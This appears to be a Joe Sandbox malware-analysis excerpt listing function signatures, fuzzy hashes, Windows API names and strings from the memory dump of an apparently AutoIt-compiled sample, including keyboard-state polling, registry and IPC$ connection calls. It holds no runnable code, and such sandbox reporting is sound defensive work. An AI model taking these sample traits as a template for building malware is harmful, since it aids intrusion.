                                                                            • Instruction ID: 7fda9a934673e2a1c5e037b2564923d268e415b03a3caa1fb74ece1f2825463c
                                                                            • Opcode Fuzzy Hash: 59800c54c1d345ecb424e2fcfa2246da67464ce5bbb623b99681ad9037b4dde3
                                                                            • Instruction Fuzzy Hash: 16618222B28A4296EB20FB34E8519EDA760FB947D4FC00032EA4D47A99DF7CE517C750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString$Messagewprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 4051287042-2268648507
                                                                            • Opcode ID: 68b2247ec9c07577535dadd4f69f0712e57ab61aa0c6408de1f9cb681492f952
                                                                            • Instruction ID: dfe1d165a734fdcff1a3884528c1953dfec9721287dd3b42ae72b4baa5011d1b
                                                                            • Opcode Fuzzy Hash: 68b2247ec9c07577535dadd4f69f0712e57ab61aa0c6408de1f9cb681492f952
                                                                            • Instruction Fuzzy Hash: FE516E22B28A4291EB20FB74E8418EDA761FF947D4BC01032EA0D5769ADF7CD517C750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Thread$Window$CurrentMessageProcessSendSleep$ActiveAttachDialogEnumFindInputTimeWindowstime
                                                                            • String ID: BUTTON
                                                                            • API String ID: 3935177441-3405671355
                                                                            • Opcode ID: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                            • Instruction ID: db3452933959c456c949975974b74e2d078298e377298fcb5d186eda98f86bbd
                                                                            • Opcode Fuzzy Hash: f78108109216f5a9e13feac809e7b4bcbb9376684aa6c7b0e89a3c685e053ef5
                                                                            • Instruction Fuzzy Hash: 5A314B21B09A0782FB34BB34E854B75AB61AF847D4FC64031D90E86694DF2CA4A78271
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Destroy$AcceleratorKillTableTimerWindow
                                                                            • String ID:
                                                                            • API String ID: 1974058525-0
                                                                            • Opcode ID: 0ae01efd328c1abf4b21f20b8ee9207ae2ca8527ede716ab22c06984e821e5e4
                                                                            • Instruction ID: e796291141ae2bda3d942f52fd71187a7840d4d2da8ce571b5bd8ee1fbc8018e
                                                                            • Opcode Fuzzy Hash: 0ae01efd328c1abf4b21f20b8ee9207ae2ca8527ede716ab22c06984e821e5e4
                                                                            • Instruction Fuzzy Hash: 57913E21A0AA0285EB74BF79D850A78AB64FF84FD4FD84431C94E47759DF3CE4628360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Window$ItemMoveRect$Invalidate
                                                                            • String ID:
                                                                            • API String ID: 3096461208-0
                                                                            • Opcode ID: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                            • Instruction ID: 96c532b810a6be6fddea14677abcb91b04ed4811ff5a9f837117c2f3fd75de9e
                                                                            • Opcode Fuzzy Hash: cd18a514988302620758944a1eb5a442a77522faab4df44982a6bd62bf806ab3
                                                                            • Instruction Fuzzy Hash: 9D618472B046418BE728DF79E84496D7BE2BB88B84F508139DE0993F58DF3CD9568B10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharDriveLowerTypewcscpy
                                                                            • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                            • API String ID: 1561581874-1000479233
                                                                            • Opcode ID: ef46e324cca21653e1380765f360d318f6eac9cdecb985703fecfcb3deabfef4
                                                                            • Instruction ID: 04a4d65b5f10826dca808c6664a4377a5c03e8bc00adbfb5a8826aca125b5fdd
                                                                            • Opcode Fuzzy Hash: ef46e324cca21653e1380765f360d318f6eac9cdecb985703fecfcb3deabfef4
                                                                            • Instruction Fuzzy Hash: 12D1F322E0869681EA30BB35D541979EBA0FF58BE4FC04231DA5D537A5DF3CE9678320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout
                                                                            • String ID: %s%u
                                                                            • API String ID: 1412819556-679674701
                                                                            • Opcode ID: 471b516b84a7647fd4691574628735fa1d53b92c229bd2799b629a7d46638598
                                                                            • Instruction ID: 4066500016ae7b18032e6fa6e7825ea24e31086492c1273d35f595d07b41ee7a
                                                                            • Opcode Fuzzy Hash: 471b516b84a7647fd4691574628735fa1d53b92c229bd2799b629a7d46638598
                                                                            • Instruction Fuzzy Hash: E3B1C272B1868696EB2CAB35D844AF9AB61FB44BC4FC00031CA1D47785EF3DE566C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: ClassName$Window$Text$BuffCharRectUpperwcsstr
                                                                            • String ID: ThumbnailClass
                                                                            • API String ID: 4010642439-1241985126
                                                                            • Opcode ID: 4089a0f050729c67d7336b45243c4151a1a91afee2041f579baef993fdf79b1a
                                                                            • Instruction ID: bc87ba08fc76853709abf7b8f3027a9de5bf164ee19356727e89b4bbb13e72e4
                                                                            • Opcode Fuzzy Hash: 4089a0f050729c67d7336b45243c4151a1a91afee2041f579baef993fdf79b1a
                                                                            • Instruction Fuzzy Hash: A4A17422B0864647EA38AB35D444AB9EB72FB857C4FC44035DA8E03A95DF3DF956CB10
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                                            • String ID: P
                                                                            • API String ID: 1268354404-3110715001
                                                                            • Opcode ID: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                            • Instruction ID: be3c37bfd0c47c9febb8bd3f7cbfc3bc6243055c3ad283336b017432345cfcf9
                                                                            • Opcode Fuzzy Hash: 02435e4ac2fd25411414f443f70b9a64b2fb5eec06818f208819b822860aaaf9
                                                                            • Instruction Fuzzy Hash: A0619235A09A428AEB34BF39D840A79AB90FF84BD8F940536DD4E47B58DF3CE4528750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: LoadStringwprintf
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 3297454147-2391861430
                                                                            • Opcode ID: 4bdd4d368305ed2511e7c9b5f66333011c7442f4138e402f4b5ca8b6273d0e40
                                                                            • Instruction ID: 128a83a797215794be0f3241284d974ca92d472a5de5603e3a7a2e01413758c0
                                                                            • Opcode Fuzzy Hash: 4bdd4d368305ed2511e7c9b5f66333011c7442f4138e402f4b5ca8b6273d0e40
                                                                            • Instruction Fuzzy Hash: 04716122B28A5296EB20FB75D4418EDAB20FB847D4FC01032EA1D07A99DF7CE517C750
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue
                                                                            • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                            • API String ID: 3030280669-22481851
                                                                            • Opcode ID: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                            • Instruction ID: 338020de2838886c11344f6aaf58be475db0b2113c5a121ca5bd111493f13cb9
                                                                            • Opcode Fuzzy Hash: a4a03563eba47bf7a6bc45b00431da315f02e209d49ab1ef43027d618f4c2dd1
                                                                            • Instruction Fuzzy Hash: 6951B622718A8295EB60FB79E8949EDAB60FB943D4F800031EA0D47A69EF3CD557C710
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove
                                                                            • String ID: :$\$\??\%s
                                                                            • API String ID: 3827137101-3457252023
                                                                            • Opcode ID: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                            • Instruction ID: 548c9e38dc521171d895020ac9d69a8fb4bc5c5be9ea960417f3be76fe8c5f7c
                                                                            • Opcode Fuzzy Hash: c042ec0e4a157b4915e6cbee2efc7bd563a20e0e85c4cf7d435b60959deae5d8
                                                                            • Instruction Fuzzy Hash: 34416D2261868385E730AB71E804AFDA7A0FF85798F940136DA4D47FA8DF7CD6678710
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Security$DescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                            • String ID:
                                                                            • API String ID: 1255039815-0
                                                                            • Opcode ID: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                            • Instruction ID: 92a49d26df7ef5e1f771d771e8b1f89b824529acea253526eece105461e1d3cc
                                                                            • Opcode Fuzzy Hash: 5c88d37276b46e33d2a1e391526b812f5276439b55f88bb912c7bbc104166e1e
                                                                            • Instruction Fuzzy Hash: 96618F22B1465186EB20EF71D8489ACBBB4FF44BC8B848035DE1E53B95DF39E556C360
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: State$Async$Keyboard
                                                                            • String ID:
                                                                            • API String ID: 541375521-0
                                                                            • Opcode ID: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                            • Instruction ID: 433265058de2eb072f52d0aa332facaa5356f57ec90306fc2226790b2819ae78
                                                                            • Opcode Fuzzy Hash: 0d5fea19e654a2244c488208034703c69de1b6555bf9c6d80bb1d0db3dd32864
                                                                            • Instruction Fuzzy Hash: 0741A722E0C6C155FB79BB709800B79AE90EF95BE4F884039C789035C6CF5DA8B69371
                                                                            APIs
                                                                              • Part of subcall function 00007FF797836838: CreateFileW.KERNELBASE ref: 00007FF7978368A2
                                                                              • Part of subcall function 00007FF797854380: GetCurrentDirectoryW.KERNEL32(?,00007FF79783E817), ref: 00007FF79785439C
                                                                              • Part of subcall function 00007FF7978356D4: GetFullPathNameW.KERNEL32(?,00007FF7978356C1,?,00007FF797837A0C,?,?,?,00007FF79783109E), ref: 00007FF7978356FF
                                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF79783E8B0
                                                                            • SetCurrentDirectoryW.KERNEL32 ref: 00007FF79783E9FA
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$CreateFileFullNamePathwcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 2207129308-1018226102
                                                                            • Opcode ID: 5bfa004ec22c833a2472a908fe95c9b7691a976b7a6d51bd3e5b7c8dec0a9794
                                                                            • Instruction ID: ecc073535efe26b83b56bbe7340d750e405d3c211619710efff355639e43afb9
                                                                            • Opcode Fuzzy Hash: 5bfa004ec22c833a2472a908fe95c9b7691a976b7a6d51bd3e5b7c8dec0a9794
                                                                            • Instruction Fuzzy Hash: DB129122A1864296EB20FB35D4419FEEB60FB947D4FC00132EA5E47A9ADF7CD516C720
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                            • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                            • API String ID: 636576611-1287834457
                                                                            • Opcode ID: d3a580e491fa370693ce8ba862392fa3376b342775cf25ffc1cf68725eb2da1d
                                                                            • Instruction ID: 11eaea764a923795757e4b2610ed16c19cde30b50c068cd3e70a3b590b36276d
                                                                            • Opcode Fuzzy Hash: d3a580e491fa370693ce8ba862392fa3376b342775cf25ffc1cf68725eb2da1d
                                                                            • Instruction Fuzzy Hash: 0E712962B08B06C5EB24AF36E4409ADAB60FF54BD8B985431DE0E47765DF38E4568360
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: _invalid_parameter_noinfo
                                                                            • String ID: INF$NAN$NAN(IND)$NAN(SNAN)$inf$nan$nan(ind)$nan(snan)
                                                                            • API String ID: 3215553584-2617248754
                                                                            • Opcode ID: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                            • Instruction ID: d3036bb4d259cc78198fe57547e77a848aac65d4d20f384ba3c8ef82eb19c12f
                                                                            • Opcode Fuzzy Hash: e534a4a1f8a44b0f303199b2ab2fa91302a5b5a6dc95b4e8f2eb5eb0306d3d2b
                                                                            • Instruction Fuzzy Hash: 41419D32A05F4599FB60EB35E841BA97BA4FB08798F804136EE5C47B54EE3CD026C354
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: Error$Mode$DiskFreeLastSpace
                                                                            • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                            • API String ID: 4194297153-14809454
                                                                            • Opcode ID: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                            • Instruction ID: 47d75439835b227d72bd3fb596a2dd826993ace7ca95a562fedb1662a3a3c0ba
                                                                            • Opcode Fuzzy Hash: f10055d30637c38e5cee514d44455591cda2366b25399950410d251fa1d84edd
                                                                            • Instruction Fuzzy Hash: A8415132A08A4295EB20BB35D8805ACBB71FB48BD4F845436DA0D53795DF3CD5A7C320
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702479678.00007FF79791A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702496489.00007FF797924000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_7ff797830000_file.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadMessageModuleStringwprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                            • API String ID: 4007322891-4153970271
                                                                            • Opcode ID: d2c53d1d959ddbb042106dfbd728545592dc85493fc1c840e99c250cd80bea81
                                                                            • Instruction ID: a8a52df59481d64f2626cf7e47b7c403a096509a40f48a4f89760dce11e7c633
                                                                            • Opcode Fuzzy Hash: d2c53d1d959ddbb042106dfbd728545592dc85493fc1c840e99c250cd80bea81
                                                                            • Instruction Fuzzy Hash: A6316D32A28A8295DB20FB35E8459ADA760FF84BD4FC04032EA4D47699DF7CD527C760
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1702339126.00007FF797831000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF797830000, based on PE: true
                                                                            • Associated: 00000000.00000002.1702322584.00007FF797830000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF7978E5000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1702434297.00007FF797908000.00000002.00000001.01000000.00000003.sdmpDownload File
